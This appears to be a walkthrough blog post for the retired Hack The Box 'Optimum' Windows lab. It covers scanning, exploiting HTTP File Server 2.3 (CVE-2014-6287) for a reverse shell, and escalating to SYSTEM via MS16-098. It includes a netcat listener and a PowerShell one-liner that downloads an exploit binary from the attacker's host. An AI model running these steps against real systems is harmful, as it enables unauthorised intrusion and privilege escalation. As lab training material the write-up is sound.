Hack The Box Optimum Writeup
Hack The Box (HTB) is an online training platform to enhance skills in penetration testing. Optimum is a retired Windows-based box having IP 10.10.10.8.
Box Details
OS | Windows |
Difficulty | Easy |
Release | 18 March 2017 |
IP | 10.10.10.8 |
Start with Nmap
Run Nmap default scripts (-sC) and enumerate versions (-sV).
#nmap -sC -sV 10.10.10.8 | tee nmap-initial.txt
To check all open ports
#nmap -p- 10.10.10.8 | tee nmap-all-ports.txt
Run UDP scan
#nmap -sU 10.10.10.8
As port 80 is open, try IP on web browser
Search on google to find exploit of HTTP File Server 2.3 and found CVE:2014-6287.
Read instruction to execute the payload
Identify nc.exe on Kali and copy it in current directory
#locate nc.exe
Edit payload with local IP and port. Save it. Use ifconfig to identify the IP address of your machine.
ip_addr = "10.10.14.16"
local_port = "1111"
Execute the exploit
#nc -lvnp 1111
#python -m SimpleHTTPServer 80
#python exploit.py 10.10.10.8 80
Got shell. Check user token
Privilege Escalation
Use systeminfo to identify information of OS
>systeminfo
Copy this output in text format (I have copied it in config-info.txt). Identify vulnerability by checking patches by using github repository code. Run privilege escalation exploit code by using below command:
#python windows-exploit-suggester.py--
database 2020-12-02-mssb.xls--
systeminfo config-info.txt
Many exploits available for privilege escalation. I have used "Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)". You can downlaod 41020.exe by using github repository.
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
Transfer exe file to machine and execute it by using below command to get system.
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.9/41020.exe','C:\Users\kostas\Desktop\41020.exe')"
41020.exe
Check by command "whoami". If output is below, got system.
nt authority\system
Conclusion
This article is a quick write-up on HTB Optimum Windows box. If you have some issues in any step, let me know in the comment section.
Subscribe us to receive more such articles updates in your email.
If you have any questions, feel free to ask in the comments section below. Nothing gives me greater joy than helping my readers!
Disclaimer: This tutorial is for educational purpose only. Individual is solely responsible for any illegal act.